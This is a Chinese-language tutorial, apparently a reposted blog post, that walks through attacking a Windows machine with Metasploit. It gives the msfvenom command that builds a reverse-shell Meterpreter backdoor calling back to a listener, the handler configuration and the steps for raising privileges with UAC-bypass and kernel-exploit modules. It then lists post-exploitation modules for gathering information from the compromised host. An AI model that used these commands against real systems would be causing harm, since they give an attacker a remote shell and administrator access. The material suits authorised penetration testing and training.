msf windows简单渗透
程序员文章站
2022-07-15 14:11:48
...
建立后门
一 建立反弹后门
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.8 LPORT=4444 -f exe >shell.exe
二 监听端口建立回话
1 使用handler模块
msf > use exploit/multi/handler
2 设置payload
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
PAYLOAD =>windows/meterpreter/reverse_tcp
3 设置监听主机
msfexploit(multi/handler) > set LHOST 192.168.1.8
LHOST =>192.168.1.8
4 设置监听端口(默认4444)
msfexploit(multi/handler) > set LPORT 4444
LPORT => 4444
5 发动攻击
msfexploit(multi/handler) > exploit # (或者run)
三 目标机器执行shell后门脚本
获得一个普通用户权限
尝试提权失败
权限提升思路:
- 提高程序运行级别
- Uac绕过
- 利用提权漏洞进行绕过
权限提升
exploit/windows/local/ask
执行完后,目标机器就会弹出
我们就会获得一个新的session
再次尝试提权就会成功
另一种权限提升思路:
UAC绕过
msf模块:
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
我们使用第一个模块:
use exploit/windows/local/bypassuac
设置低权限的session
msf5 exploit(windows/local/bypassuac) > set session 1
开始执行,发现提权成功
利用提权漏洞进行提权:
exploit/windows/local/ms14_058_track_popup_menu
提权失败,看提示信息这种漏洞只支持32位的操作系统,而目标机器是64位的
利用模块
exploit/windows/local/ms16_016_webdav
该模块同样不支持64位操作系统
信息收集
msf 模块
获取目标机器的分区情况:
post/windows/gather/forensics/enum_drives
判断是否为虚拟机:
post/windows/gather/checkvm
开启了哪些服务:
post/windows/gather/enum_services
安装了哪些应用:
posst/windows/gather/enum_applications
查看共享:
post/windows/gather/enum_applications
获得主机最近的系统操作:
post/windows/gather/dumplinks
查看补丁:
post/windows/gather/enum_patches
自动化脚本:
scraper脚本
Winenum脚本
参考文章:
https://blog.csdn.net/u012991692/article/details/80784258
上一篇: msf后渗透